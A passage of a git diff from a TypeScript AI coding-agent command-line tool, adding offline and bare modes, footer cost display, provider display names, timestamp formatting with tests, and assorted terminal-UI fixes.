`Error: --offline requires all configured models to be local. Found remote model: ${remoteModel.name} (${remoteModel.baseUrl || "cloud API"})`, + ); + process.exit(1); + } + } + } else if (modelRegistry.isAllLocalChain() && modelRegistry.getAll().length > 0) { + // Auto-detect: all models are local, enable offline mode + process.env.PI_OFFLINE = "1"; + process.env.PI_SKIP_VERSION_CHECK = "1"; + console.log("[gsd] All configured models are local \u2014 enabling offline mode automatically."); + } + const resourceLoader = new DefaultResourceLoader({ cwd, agentDir, @@ -621,11 +419,13 @@ export async function main(args: string[]) { additionalPromptTemplatePaths: firstPass.promptTemplates, additionalThemePaths: firstPass.themes, noExtensions: firstPass.noExtensions, - noSkills: firstPass.noSkills, - noPromptTemplates: firstPass.noPromptTemplates, - noThemes: firstPass.noThemes, + noSkills: firstPass.noSkills || firstPass.bare, + noPromptTemplates: firstPass.noPromptTemplates || firstPass.bare, + noThemes: firstPass.noThemes || firstPass.bare, systemPrompt: firstPass.systemPrompt, appendSystemPrompt: firstPass.appendSystemPrompt, + // --bare: suppress CLAUDE.md/AGENTS.md ancestor walk + ...(firstPass.bare ? { agentsFilesOverride: () => ({ agentsFiles: [] }) } : {}), }); await resourceLoader.reload(); time("resourceLoader.reload"); diff --git a/packages/pi-coding-agent/src/modes/index.ts b/packages/pi-coding-agent/src/modes/index.ts index 205e9f54c..1e31e54e0 100644 --- a/packages/pi-coding-agent/src/modes/index.ts +++ b/packages/pi-coding-agent/src/modes/index.ts @@ -6,4 +6,11 @@ export { InteractiveMode, type InteractiveModeOptions } from "./interactive/inte export { type PrintModeOptions, runPrintMode } from "./print-mode.js"; export { type ModelInfo, RpcClient, type RpcClientOptions, type RpcEventListener } from "./rpc/rpc-client.js"; export { runRpcMode } from "./rpc/rpc-mode.js"; -export type { RpcCommand, RpcResponse, RpcSessionState } from "./rpc/rpc-types.js"; +export type { + RpcCommand, + RpcInitResult, + RpcProtocolVersion, + RpcResponse, + RpcSessionState, + RpcV2Event, +} from "./rpc/rpc-types.js"; diff --git a/packages/pi-coding-agent/src/modes/interactive/components/__tests__/provider-display-name.test.ts b/packages/pi-coding-agent/src/modes/interactive/components/__tests__/provider-display-name.test.ts new file mode 100644 index 000000000..6b918294d --- /dev/null +++ b/packages/pi-coding-agent/src/modes/interactive/components/__tests__/provider-display-name.test.ts @@ -0,0 +1,18 @@ +// GSD-2 — Provider display name mapping tests +import { test, describe } from "node:test"; +import assert from "node:assert/strict"; +import { providerDisplayName } from "../model-selector.js"; + +describe("providerDisplayName", () => { + test("renames 'anthropic' to 'anthropic-api'", () => { + assert.equal(providerDisplayName("anthropic"), "anthropic-api"); + }); + + test("passes through unmapped providers unchanged", () => { + assert.equal(providerDisplayName("claude-code"), "claude-code"); + assert.equal(providerDisplayName("openai"), "openai"); + assert.equal(providerDisplayName("bedrock"), "bedrock"); + assert.equal(providerDisplayName("github-copilot"), "github-copilot"); + assert.equal(providerDisplayName("openrouter"), "openrouter"); + }); +}); diff --git a/packages/pi-coding-agent/src/modes/interactive/components/__tests__/timestamp.test.ts b/packages/pi-coding-agent/src/modes/interactive/components/__tests__/timestamp.test.ts new file mode 100644 index 000000000..c5eb4ce74 --- /dev/null +++ b/packages/pi-coding-agent/src/modes/interactive/components/__tests__/timestamp.test.ts @@ -0,0 +1,38 @@ +import { test, describe } from "node:test"; +import assert from "node:assert/strict"; +import { formatTimestamp } from "../timestamp.js"; + +describe("formatTimestamp", () => { + // Use a fixed local timestamp to avoid timezone issues + const d = new Date(2026, 2, 24, 10, 34, 0); // Mar 24, 2026 10:34:00 local time + const ts = d.getTime(); + + test("date-time-iso format (default)", () => { + assert.equal(formatTimestamp(ts, "date-time-iso"), "2026-03-24 10:34"); + assert.equal(formatTimestamp(ts), "2026-03-24 10:34"); // default + }); + + test("date-time-us format", () => { + assert.equal(formatTimestamp(ts, "date-time-us"), "03-24-2026 10:34 AM"); + }); + + test("US format handles PM correctly", () => { + const pm = new Date(2026, 2, 24, 14, 5, 0).getTime(); + assert.equal(formatTimestamp(pm, "date-time-us"), "03-24-2026 2:05 PM"); + }); + + test("US format handles noon as 12 PM", () => { + const noon = new Date(2026, 2, 24, 12, 0, 0).getTime(); + assert.equal(formatTimestamp(noon, "date-time-us"), "03-24-2026 12:00 PM"); + }); + + test("US format handles midnight as 12 AM", () => { + const midnight = new Date(2026, 2, 24, 0, 0, 0).getTime(); + assert.equal(formatTimestamp(midnight, "date-time-us"), "03-24-2026 12:00 AM"); + }); + + test("ISO format pads single digit months and days", () => { + const jan1 = new Date(2026, 0, 1, 9, 5, 0).getTime(); + assert.equal(formatTimestamp(jan1, "date-time-iso"), "2026-01-01 09:05"); + }); +}); diff --git a/packages/pi-coding-agent/src/modes/interactive/components/armin.ts b/packages/pi-coding-agent/src/modes/interactive/components/armin.ts index afa0d780a..35a591c16 100644 --- a/packages/pi-coding-agent/src/modes/interactive/components/armin.ts +++ b/packages/pi-coding-agent/src/modes/interactive/components/armin.ts @@ -2,7 +2,7 @@ * Armin says hi! A fun easter egg with animated XBM art. */ -import type { Component, TUI } from "@gsd/pi-tui"; +import { type Component, type TUI, visibleWidth } from "@gsd/pi-tui"; import { theme } from "../theme/theme.js"; // XBM image: 31x36 pixels, LSB first, 1=background, 0=foreground @@ -88,20 +88,20 @@ export class ArminComponent implements Component { return this.cachedLines; } - const padding = 1; - const availableWidth = width - padding; + const center = (s: string) => { + const visible = visibleWidth(s); + const left = Math.max(0, Math.floor((width - visible) / 2)); + return " ".repeat(left) + s; + }; this.cachedLines = this.currentGrid.map((row) => { - // Clip row to available width before applying color - const clipped = row.slice(0, availableWidth).join(""); - const padRight = Math.max(0, width - padding - clipped.length); - return ` ${theme.fg("accent", clipped)}${" ".repeat(padRight)}`; + const clipped = row.slice(0, width).join(""); + return center(theme.fg("accent", clipped)); }); // Add "ARMIN SAYS HI" at the end const message = "ARMIN SAYS HI"; - const msgPadRight = Math.max(0, width - padding - message.length); - this.cachedLines.push(` ${theme.fg("accent", message)}${" ".repeat(msgPadRight)}`); + this.cachedLines.push(center(theme.fg("accent", message))); this.cachedWidth = width; this.cachedVersion = this.gridVersion; diff --git a/packages/pi-coding-agent/src/modes/interactive/components/assistant-message.ts b/packages/pi-coding-agent/src/modes/interactive/components/assistant-message.ts index fe78c54e9..c558b7cfc 100644 --- a/packages/pi-coding-agent/src/modes/interactive/components/assistant-message.ts +++ b/packages/pi-coding-agent/src/modes/interactive/components/assistant-message.ts @@ -1,6 +1,7 @@ import type { AssistantMessage } from "@gsd/pi-ai"; import { Container, Markdown, type MarkdownTheme, Spacer, Text } from "@gsd/pi-tui"; import { getMarkdownTheme, theme } from "../theme/theme.js"; +import { formatTimestamp, type TimestampFormat } from "./timestamp.js"; /** * Component that renders a complete assistant message @@ -10,16 +11,19 @@ export class AssistantMessageComponent extends Container { private hideThinkingBlock: boolean; private markdownTheme: MarkdownTheme; private lastMessage?: AssistantMessage; + private timestampFormat: TimestampFormat; constructor( message?: AssistantMessage, hideThinkingBlock = false, markdownTheme: MarkdownTheme = getMarkdownTheme(), + timestampFormat: TimestampFormat = "date-time-iso", ) { super(); this.hideThinkingBlock = hideThinkingBlock; this.markdownTheme = markdownTheme; + this.timestampFormat = timestampFormat; // Container for text/thinking content this.contentContainer = new Container(); @@ -101,8 +105,6 @@ export class AssistantMessageComponent extends Container { : "Operation aborted"; if (hasVisibleContent) { this.contentContainer.addChild(new Spacer(1)); - } else { - this.contentContainer.addChild(new Spacer(1)); } this.contentContainer.addChild(new Text(theme.fg("error", abortMessage), 1, 0)); } else if (message.stopReason === "error") { @@ -111,5 +113,11 @@ export class AssistantMessageComponent extends Container { this.contentContainer.addChild(new Text(theme.fg("error", `Error: ${errorMsg}`), 1, 0)); } } + + // Show timestamp when the message is complete (has a stop reason) + if (message.stopReason && message.timestamp) { + const timeStr = formatTimestamp(message.timestamp, this.timestampFormat); + this.contentContainer.addChild(new Text(theme.fg("dim", timeStr), 1, 0)); + } } } diff --git a/packages/pi-coding-agent/src/modes/interactive/components/bash-execution.ts b/packages/pi-coding-agent/src/modes/interactive/components/bash-execution.ts index cec80e097..b35855e0f 100644 --- a/packages/pi-coding-agent/src/modes/interactive/components/bash-execution.ts +++ b/packages/pi-coding-agent/src/modes/interactive/components/bash-execution.ts @@ -29,6 +29,7 @@ export class BashExecutionComponent extends Container { private expanded = false; private contentContainer: Container; private ui: TUI; + private _borderColorKey: "dim" | "bashMode"; constructor(command: string, ui: TUI, excludeFromContext = false) { super(); @@ -37,6 +38,7 @@ export class BashExecutionComponent extends Container { // Use dim border for excluded-from-context commands (!! prefix) const colorKey = excludeFromContext ? "dim" : "bashMode"; + this._borderColorKey = colorKey; const borderColor = (str: string) => theme.fg(colorKey, str); // Add spacer @@ -137,7 +139,7 @@ export class BashExecutionComponent extends Container { this.contentContainer.clear(); // Command header - const header = new Text(theme.fg("bashMode", theme.bold(`$ ${this.command}`)), 1, 0); + const header = new Text(theme.fg(this._borderColorKey, theme.bold(`$ ${this.command}`)), 1, 0); this.contentContainer.addChild(header); // Output diff --git a/packages/pi-coding-agent/src/modes/interactive/components/bordered-loader.ts b/packages/pi-coding-agent/src/modes/interactive/components/bordered-loader.ts index d2610da96..9c4dae2d2 100644 --- a/packages/pi-coding-agent/src/modes/interactive/components/bordered-loader.ts +++ b/packages/pi-coding-agent/src/modes/interactive/components/bordered-loader.ts @@ -34,8 +34,8 @@ export class BorderedLoader extends Container { if (this.cancellable) { this.addChild(new Spacer(1)); this.addChild(new Text(keyHint("selectCancel", "cancel"), 1, 0)); + this.addChild(new Spacer(1)); } - this.addChild(new Spacer(1)); this.addChild(new DynamicBorder(borderColor)); } diff --git a/packages/pi-coding-agent/src/modes/interactive/components/branch-summary-message.ts b/packages/pi-coding-agent/src/modes/interactive/components/branch-summary-message.ts index c7b666a2f..9c7ed9730 100644 --- a/packages/pi-coding-agent/src/modes/interactive/components/branch-summary-message.ts +++ b/packages/pi-coding-agent/src/modes/interactive/components/branch-summary-message.ts @@ -32,7 +32,7 @@ export class BranchSummaryMessageComponent extends Box { private updateDisplay(): void { this.clear(); - const label = theme.fg("customMessageLabel", `\x1b[1m[branch]\x1b[22m`); + const label = theme.fg("customMessageLabel", theme.bold("[branch]")); this.addChild(new Text(label, 0, 0)); this.addChild(new Spacer(1)); diff --git a/packages/pi-coding-agent/src/modes/interactive/components/compaction-summary-message.ts b/packages/pi-coding-agent/src/modes/interactive/components/compaction-summary-message.ts index ace738406..f7e68e259 100644 --- a/packages/pi-coding-agent/src/modes/interactive/components/compaction-summary-message.ts +++ b/packages/pi-coding-agent/src/modes/interactive/components/compaction-summary-message.ts @@ -33,7 +33,7 @@ export class CompactionSummaryMessageComponent extends Box { this.clear(); const tokenStr = this.message.tokensBefore.toLocaleString(); - const label = theme.fg("customMessageLabel", `\x1b[1m[compaction]\x1b[22m`); + const label = theme.fg("customMessageLabel", theme.bold("[compaction]")); this.addChild(new Text(label, 0, 0)); this.addChild(new Spacer(1)); diff --git a/packages/pi-coding-agent/src/modes/interactive/components/config-selector.ts b/packages/pi-coding-agent/src/modes/interactive/components/config-selector.ts index 61f6d57dd..befee7ca6 100644 --- a/packages/pi-coding-agent/src/modes/interactive/components/config-selector.ts +++ b/packages/pi-coding-agent/src/modes/interactive/components/config-selector.ts @@ -346,9 +346,14 @@ class ResourceList implements Component, Focusable { } } - // Scroll indicator + // Scroll indicator — count only selectable items (exclude group/subgroup headers) if (startIndex > 0 || endIndex < this.filteredItems.length) { - lines.push(theme.fg("dim", ` (${this.selectedIndex + 1}/${this.filteredItems.length})`)); + const selectableItems = this.filteredItems.filter((e) => e.type === "item"); + const selectableTotal = selectableItems.length; + const selectablePosition = selectableItems.findIndex( + (e) => this.filteredItems.indexOf(e) === this.selectedIndex, + ); + lines.push(theme.fg("dim", ` (${selectablePosition + 1}/${selectableTotal})`)); } return lines; diff --git a/packages/pi-coding-agent/src/modes/interactive/components/countdown-timer.ts b/packages/pi-coding-agent/src/modes/interactive/components/countdown-timer.ts index 0f051c2f6..ef77320d3 100644 --- a/packages/pi-coding-agent/src/modes/interactive/components/countdown-timer.ts +++ b/packages/pi-coding-agent/src/modes/interactive/components/countdown-timer.ts @@ -7,6 +7,7 @@ import type { TUI } from "@gsd/pi-tui"; export class CountdownTimer { private intervalId: ReturnType | undefined; private remainingSeconds: number; + private _disposed = false; constructor( timeoutMs: number, @@ -18,6 +19,7 @@ export class CountdownTimer { this.onTick(this.remainingSeconds); this.intervalId = setInterval(() => { + if (this._disposed) return; this.remainingSeconds--; this.onTick(this.remainingSeconds); this.tui?.requestRender(); @@ -30,6 +32,7 @@ export class CountdownTimer { } dispose(): void { + this._disposed = true; if (this.intervalId) { clearInterval(this.intervalId); this.intervalId = undefined; diff --git a/packages/pi-coding-agent/src/modes/interactive/components/custom-message.ts b/packages/pi-coding-agent/src/modes/interactive/components/custom-message.ts index f3f6455fb..ba7cf9634 100644 --- a/packages/pi-coding-agent/src/modes/interactive/components/custom-message.ts +++ b/packages/pi-coding-agent/src/modes/interactive/components/custom-message.ts @@ -75,7 +75,7 @@ export class CustomMessageComponent extends Container { this.box.clear(); // Default rendering: label + content - const label = theme.fg("customMessageLabel", `\x1b[1m[${this.message.customType}]\x1b[22m`); + const label = theme.fg("customMessageLabel", theme.bold(`[${this.message.customType}]`)); this.box.addChild(new Text(label, 0, 0)); this.box.addChild(new Spacer(1)); diff --git a/packages/pi-coding-agent/src/modes/interactive/components/daxnuts.ts b/packages/pi-coding-agent/src/modes/interactive/components/daxnuts.ts index e501cd435..47b87e146 100644 --- a/packages/pi-coding-agent/src/modes/interactive/components/daxnuts.ts +++ b/packages/pi-coding-agent/src/modes/interactive/components/daxnuts.ts @@ -4,7 +4,7 @@ * A heartfelt tribute to dax (@thdxr) for providing free Kimi K2.5 access via OpenCode. */ -import type { Component, TUI } from "@gsd/pi-tui"; +import { type Component, type TUI, visibleWidth } from "@gsd/pi-tui"; import { theme } from "../theme/theme.js"; // 32x32 RGB image of dax, hex encoded (3 bytes per pixel) @@ -101,7 +101,7 @@ export class DaxnutsComponent implements Component { const lines: string[] = []; const center = (s: string) => { - const visible = s.replace(/\x1b\[[0-9;]*m/g, "").length; + const visible = visibleWidth(s); const left = Math.max(0, Math.floor((width - visible) / 2)); return " ".repeat(left) + s; }; @@ -145,7 +145,8 @@ export class DaxnutsComponent implements Component { lines.push(""); if (textPhase > 2 || this.tick >= this.maxTicks) { lines.push(center(t.fg("dim", "Try OpenCode"))); - lines.push(center(t.fg("mdLink", "https://mistral.ai/news/mistral-vibe-2-0"))); + // URL removed — was pointing to an incorrect destination + lines.push(center(t.fg("mdLink", "opencode.ai"))); } else { lines.push(""); lines.push(""); diff --git a/packages/pi-coding-agent/src/modes/interactive/components/diff.ts b/packages/pi-coding-agent/src/modes/interactive/components/diff.ts index d575d63e3..55131b023 100644 --- a/packages/pi-coding-agent/src/modes/interactive/components/diff.ts +++ b/packages/pi-coding-agent/src/modes/interactive/components/diff.ts @@ -6,7 +6,7 @@ import { theme } from "../theme/theme.js"; * Format: "+123 content" or "-123 content" or " 123 content" or " ..." */ function parseDiffLine(line: string): { prefix: string; lineNum: string; content: string } | null { - const match = line.match(/^([+-\s])(\s*\d*)\s(.*)$/); + const match = line.match(/^([+\- ])(\s*\d*)\s(.*)$/); if (!match) return null; return { prefix: match[1], lineNum: match[2], content: match[3] }; } @@ -15,7 +15,7 @@ function parseDiffLine(line: string): { prefix: string; lineNum: string; content * Replace tabs with spaces for consistent rendering. */ function replaceTabs(text: string): string { - return text.replace(/\t/g, " "); + return text.replace(/\t/g, " "); } /** diff --git a/packages/pi-coding-agent/src/modes/interactive/components/dynamic-border.ts b/packages/pi-coding-agent/src/modes/interactive/components/dynamic-border.ts index 60d2da9e3..a54298065 100644 --- a/packages/pi-coding-agent/src/modes/interactive/components/dynamic-border.ts +++ b/packages/pi-coding-agent/src/modes/interactive/components/dynamic-border.ts @@ -11,7 +11,9 @@ import { theme } from "../theme/theme.js"; export class DynamicBorder implements Component { private color: (str: string) => string; - constructor(color: (str: string) => string = (str) => theme.fg("border", str)) { + constructor(color: (str: string) => string = (str) => { + try { return theme.fg("border", str); } catch { return str; } + }) { this.color = color; } diff --git a/packages/pi-coding-agent/src/modes/interactive/components/extension-editor.ts b/packages/pi-coding-agent/src/modes/interactive/components/extension-editor.ts index f0a9eae8b..0b05c3ada 100644 --- a/packages/pi-coding-agent/src/modes/interactive/components/extension-editor.ts +++ b/packages/pi-coding-agent/src/modes/interactive/components/extension-editor.ts @@ -113,6 +113,9 @@ export class ExtensionEditorComponent extends Container implements Focusable { private openExternalEditor(): void { const editorCmd = process.env.VISUAL || process.env.EDITOR; if (!editorCmd) { + // No editor configured — nothing to do. + // The main interactive-mode handler shows a warning with an iTerm2 hint; + // this component is a secondary editor so we silently bail. return; } diff --git a/packages/pi-coding-agent/src/modes/interactive/components/extension-input.ts b/packages/pi-coding-agent/src/modes/interactive/components/extension-input.ts index 06d7ee933..525bcfc06 100644 --- a/packages/pi-coding-agent/src/modes/interactive/components/extension-input.ts +++ b/packages/pi-coding-agent/src/modes/interactive/components/extension-input.ts @@ -74,6 +74,7 @@ export class ExtensionInputComponent extends Container implements Focusable { handleInput(keyData: string): void { const kb = getEditorKeybindings(); if (kb.matches(keyData, "selectConfirm") || keyData === "\n") { + if (this.input.getValue().trim() === "") return; this.onSubmitCallback(this.input.getValue()); } else if (kb.matches(keyData, "selectCancel")) { this.onCancelCallback(); diff --git a/packages/pi-coding-agent/src/modes/interactive/components/extension-selector.ts b/packages/pi-coding-agent/src/modes/interactive/components/extension-selector.ts index 2870aed28..e24327fc8 100644 --- a/packages/pi-coding-agent/src/modes/interactive/components/extension-selector.ts +++ b/packages/pi-coding-agent/src/modes/interactive/components/extension-selector.ts @@ -96,6 +96,10 @@ export class ExtensionSelectorComponent extends Container { if (idx < 0 || idx >= this.options.length) { return Math.max(0, Math.min(from, this.options.length - 1)); } + // If all items are separators, idx may still point to one — fall back to original index + if (this.isSeparator(idx)) { + return Math.max(0, Math.min(from, this.options.length - 1)); + } return idx; } diff --git a/packages/pi-coding-agent/src/modes/interactive/components/footer.ts b/packages/pi-coding-agent/src/modes/interactive/components/footer.ts index 74842058e..3b28c0003 100644 --- a/packages/pi-coding-agent/src/modes/interactive/components/footer.ts +++ b/packages/pi-coding-agent/src/modes/interactive/components/footer.ts @@ -2,6 +2,7 @@ import { type Component, truncateToWidth, visibleWidth } from "@gsd/pi-tui"; import type { AgentSession } from "../../../core/agent-session.js"; import type { ReadonlyFooterDataProvider } from "../../../core/footer-data-provider.js"; import { theme } from "../theme/theme.js"; +import { providerDisplayName } from "./model-selector.js"; /** * Sanitize text for display in a single-line status. @@ -26,6 +27,18 @@ function formatTokens(count: number): string { return `${Math.round(count / 1000000)}M`; } +/** + * Format a cost value for compact display. + * Uses fewer decimal places for larger amounts. + * @internal Exported for testing only. + */ +export function formatPromptCost(cost: number): string { + if (cost < 0.001) return `$${cost.toFixed(4)}`; + if (cost < 0.01) return `$${cost.toFixed(3)}`; + if (cost < 1) return `$${cost.toFixed(3)}`; + return `$${cost.toFixed(2)}`; +} + /** * Footer component that shows pwd, token stats, and context usage. * Computes token/context stats from session, gets git branch and extension statuses from provider. @@ -68,10 +81,14 @@ export class FooterComponent implements Component { const totalCacheWrite = usageTotals.cacheWrite; const totalCost = usageTotals.cost; + // Use activeInferenceModel during streaming to show the model actually + // being used, not the configured model which may have been switched mid-turn. + const displayModel = state.activeInferenceModel ?? state.model; + // Calculate context usage from session (handles compaction correctly). // After compaction, tokens are unknown until the next LLM response. const contextUsage = this.session.getContextUsage(); - const contextWindow = contextUsage?.contextWindow ?? state.model?.contextWindow ?? 0; + const contextWindow = contextUsage?.contextWindow ?? displayModel?.contextWindow ?? 0; const contextPercentValue = contextUsage?.percent ?? 0; const contextPercent = contextUsage?.percent !== null ? contextPercentValue.toFixed(1) : "?"; @@ -94,21 +111,36 @@ export class FooterComponent implements Component { pwd = `${pwd} • ${sessionName}`; } - // Build stats line - const statsParts = []; - if (totalInput) statsParts.push(`↑${formatTokens(totalInput)}`); - if (totalOutput) statsParts.push(`↓${formatTokens(totalOutput)}`); - if (totalCacheRead) statsParts.push(`R${formatTokens(totalCacheRead)}`); - if (totalCacheWrite) statsParts.push(`W${formatTokens(totalCacheWrite)}`); + // Build stats line as separate groups joined by a dim middle-dot separator + const sep = ` ${theme.fg("dim", "\u00B7")} `; - // Show cost with "(sub)" indicator if using OAuth subscription - const usingSubscription = state.model ? this.session.modelRegistry.isUsingOAuth(state.model) : false; + // Group 1: token I/O + const tokenGroup: string[] = []; + if (totalInput) tokenGroup.push(`↑${formatTokens(totalInput)}`); + if (totalOutput) tokenGroup.push(`↓${formatTokens(totalOutput)}`); + + // Group 2: cache metrics + const cacheGroup: string[] = []; + if (totalCacheRead) cacheGroup.push(`cr:${formatTokens(totalCacheRead)}`); + if (totalCacheWrite) cacheGroup.push(`cw:${formatTokens(totalCacheWrite)}`); + + // Group 3: cost + const costGroup: string[] = []; + const usingSubscription = displayModel ? this.session.modelRegistry.isUsingOAuth(displayModel) : false; if (totalCost || usingSubscription) { const costStr = `$${totalCost.toFixed(3)}${usingSubscription ? " (sub)" : ""}`; - statsParts.push(costStr); + costGroup.push(costStr); } - // Colorize context percentage based on usage + // Per-prompt cost annotation (opt-in via show_token_cost preference, #1515) + if (process.env.GSD_SHOW_TOKEN_COST === "1") { + const lastTurnCost = this.session.getLastTurnCost(); + if (lastTurnCost > 0) { + costGroup.push(`(last: ${formatPromptCost(lastTurnCost)})`); + } + } + + // Group 4: context percentage (colorized) let contextPercentStr: string; const autoIndicator = this.autoCompactEnabled ? " (auto)" : ""; const contextPercentDisplay = @@ -122,12 +154,19 @@ export class FooterComponent implements Component { } else { contextPercentStr = contextPercentDisplay; } - statsParts.push(contextPercentStr); - let statsLeft = statsParts.join(" "); + // Assemble groups: items within a group are space-separated, + // groups are separated by a dim middle-dot + const groups: string[] = []; + if (tokenGroup.length > 0) groups.push(tokenGroup.join(" ")); + if (cacheGroup.length > 0) groups.push(cacheGroup.join(" ")); + if (costGroup.length > 0) groups.push(costGroup.join(" ")); + groups.push(contextPercentStr); + + let statsLeft = groups.join(sep); // Add model name on the right side, plus thinking level if model supports it - const modelName = state.model?.id || "no-model"; + const modelName = displayModel?.id || "no-model"; let statsLeftWidth = visibleWidth(statsLeft); @@ -142,7 +181,7 @@ export class FooterComponent implements Component { // Add thinking level indicator if model supports reasoning let rightSideWithoutProvider = modelName; - if (state.model?.reasoning) { + if (displayModel?.reasoning) { const thinkingLevel = state.thinkingLevel || "off"; rightSideWithoutProvider = thinkingLevel === "off" ? `${modelName} • thinking off` : `${modelName} • ${thinkingLevel}`; @@ -150,8 +189,8 @@ export class FooterComponent implements Component { // Prepend the provider in parentheses if there are multiple providers and there's enough room let rightSide = rightSideWithoutProvider; - if (this.footerData.getAvailableProviderCount() > 1 && state.model) { - rightSide = `(${state.model!.provider}) ${rightSideWithoutProvider}`; + if (this.footerData.getAvailableProviderCount() > 1 && displayModel) { + rightSide = `(${providerDisplayName(displayModel.provider)}) ${rightSideWithoutProvider}`; if (statsLeftWidth + minPadding + visibleWidth(rightSide) > width) { // Too wide, fall back rightSide = rightSideWithoutProvider; @@ -197,8 +236,9 @@ export class FooterComponent implements Component { .sort(([a], [b]) => a.localeCompare(b)) .map(([, text]) => sanitizeStatusText(text)); const statusLine = sortedStatuses.join(" "); - // Truncate to terminal width with dim ellipsis for consistency with footer style - lines.push(truncateToWidth(statusLine, width, theme.fg("dim", "..."))); + // Match the rest of the footer styling: extension statuses should render + // in the same dim color as pwd/stats, with a dim ellipsis on truncation. + lines.push(truncateToWidth(theme.fg("dim", statusLine), width, theme.fg("dim", "..."))); } return lines; diff --git a/packages/pi-coding-agent/src/modes/interactive/components/model-selector.ts b/packages/pi-coding-agent/src/modes/interactive/components/model-selector.ts index c86347b6f..9f978ffdf 100644 --- a/packages/pi-coding-agent/src/modes/interactive/components/model-selector.ts +++ b/packages/pi-coding-agent/src/modes/interactive/components/model-selector.ts @@ -15,6 +15,15 @@ import { theme } from "../theme/theme.js"; import { DynamicBorder } from "./dynamic-border.js"; import { keyHint } from "./keybinding-hints.js"; +/** Display names for providers in the model selector UI. */ +const PROVIDER_DISPLAY_NAMES: Record = { + anthropic: "anthropic-api", +}; + +export function providerDisplayName(provider: string): string { + return PROVIDER_DISPLAY_NAMES[provider] ?? provider; +} + function formatTokenCount(count: number): string { if (count >= 1_000_000) { const millions = count / 1_000_000; @@ -391,7 +400,7 @@ export class ModelSelectorComponent extends Container implements Focusable { const ctx = formatTokenCount(item.model.contextWindow); const ctxBadge = theme.fg("muted", `${ctx}`); - const providerBadge = theme.fg("muted", `[${item.provider}]`); + const providerBadge = theme.fg("muted", `[${providerDisplayName(item.provider)}]`); const checkmark = isCurrent ? theme.fg("success", " ✓") : ""; let line: string; @@ -447,7 +456,7 @@ export class ModelSelectorComponent extends Container implements Focusable { if (row.kind === "header") { // Provider group header — always unselectable - const providerLabel = theme.fg("borderAccent", row.provider); + const providerLabel = theme.fg("borderAccent", providerDisplayName(row.provider)); const count = theme.fg("muted", ` (${row.count})`); // Add blank line before header if not the very first visible row if (i > startIndex) { diff --git a/packages/pi-coding-agent/src/modes/interactive/components/oauth-selector.ts b/packages/pi-coding-agent/src/modes/interactive/components/oauth-selector.ts index 17844be07..33e23df94 100644 --- a/packages/pi-coding-agent/src/modes/interactive/components/oauth-selector.ts +++ b/packages/pi-coding-agent/src/modes/interactive/components/oauth-selector.ts @@ -96,14 +96,14 @@ export class OAuthSelectorComponent extends Container { handleInput(keyData: string): void { const kb = getEditorKeybindings(); - // Up arrow + // Up arrow (wrap) if (kb.matches(keyData, "selectUp")) { - this.selectedIndex = Math.max(0, this.selectedIndex - 1); + this.selectedIndex = this.selectedIndex === 0 ? this.allProviders.length - 1 : this.selectedIndex - 1; this.updateList(); } - // Down arrow + // Down arrow (wrap) else if (kb.matches(keyData, "selectDown")) { - this.selectedIndex = Math.min(this.allProviders.length - 1, this.selectedIndex + 1); + this.selectedIndex = this.selectedIndex === this.allProviders.length - 1 ? 0 : this.selectedIndex + 1; this.updateList(); } // Enter diff --git a/packages/pi-coding-agent/src/modes/interactive/components/provider-manager.ts b/packages/pi-coding-agent/src/modes/interactive/components/provider-manager.ts index 5944d8c78..aac53ad80 100644 --- a/packages/pi-coding-agent/src/modes/interactive/components/provider-manager.ts +++ b/packages/pi-coding-agent/src/modes/interactive/components/provider-manager.ts @@ -13,7 +13,9 @@ import { } from "@gsd/pi-tui"; import type { AuthStorage } from "../../../core/auth-storage.js"; import { getDiscoverableProviders } from "../../../core/model-discovery.js"; +import { providerDisplayName } from "./model-selector.js"; import type { ModelRegistry } from "../../../core/model-registry.js"; +import { ModelsJsonWriter } from "../../../core/models-json-writer.js"; import { theme } from "../theme/theme.js"; import { rawKeyHint } from "./keybinding-hints.js"; @@ -39,8 +41,12 @@ export class ProviderManagerComponent extends Container implements Focusable { private tui: TUI; private authStorage: AuthStorage; private modelRegistry: ModelRegistry; + private modelsJsonWriter: ModelsJsonWriter; private onDone: () => void; private onDiscover: (provider: string) => void; + private onSetupAuth: (provider: string) => void; + private confirmingRemove = false; + private hintsContainer: Container; constructor( tui: TUI, @@ -48,26 +54,26 @@ export class ProviderManagerComponent extends Container implements Focusable { modelRegistry: ModelRegistry, onDone: () => void, onDiscover: (provider: string) => void, + onSetupAuth?: (provider: string) => void, ) { super(); this.tui = tui; this.authStorage = authStorage; this.modelRegistry = modelRegistry; + this.modelsJsonWriter = new ModelsJsonWriter(this.modelRegistry.modelsJsonPath); this.onDone = onDone; this.onDiscover = onDiscover; + this.onSetupAuth = onSetupAuth ?? (() => {}); // Header this.addChild(new Text(theme.fg("accent", "Provider Manager"), 0, 0)); this.addChild(new Spacer(1)); // Hints - const hints = [ - rawKeyHint("d", "discover"), - rawKeyHint("r", "remove auth"), - rawKeyHint("esc", "close"), - ].join(" "); - this.addChild(new Text(hints, 0, 0)); + this.hintsContainer = new Container(); + this.addChild(this.hintsContainer); + this.updateHints(); this.addChild(new Spacer(1)); // List @@ -102,6 +108,34 @@ export class ProviderManagerComponent extends Container implements Focusable { supportsDiscovery: discoverableSet.has(name), modelCount: providerModelCounts.get(name) ?? 0, })); + this.clampSelectedIndex(); + } + + private clampSelectedIndex(): void { + if (this.providers.length === 0) { + this.selectedIndex = 0; + return; + } + this.selectedIndex = Math.min(this.selectedIndex, this.providers.length - 1); + } + + private updateHints(): void { + this.hintsContainer.clear(); + if (this.confirmingRemove) { + const hints = [ + rawKeyHint("r", "confirm removal"), + rawKeyHint("esc", "cancel"), + ].join(" "); + this.hintsContainer.addChild(new Text(hints, 0, 0)); + } else { + const hints = [ + rawKeyHint("enter", "setup auth"), + rawKeyHint("d", "discover"), + rawKeyHint("r", "remove auth"), + rawKeyHint("esc", "close"), + ].join(" "); + this.hintsContainer.addChild(new Text(hints, 0, 0)); + } } private updateList(): void { @@ -116,7 +150,7 @@ export class ProviderManagerComponent extends Container implements Focusable { const countBadge = theme.fg("muted", `(${p.modelCount} models)`); const prefix = isSelected ? theme.fg("accent", "> ") : " "; - const nameText = isSelected ? theme.fg("accent", p.name) : p.name; + const nameText = isSelected ? theme.fg("accent", providerDisplayName(p.name)) : providerDisplayName(p.name); const parts = [prefix, nameText, " ", authBadge]; if (discoveryBadge) parts.push(" ", discoveryBadge); @@ -144,7 +178,13 @@ export class ProviderManagerComponent extends Container implements Focusable { this.updateList(); this.tui.requestRender(); } else if (kb.matches(keyData, "selectCancel")) { - this.onDone(); + if (this.confirmingRemove) { + this.confirmingRemove = false; + this.updateHints(); + 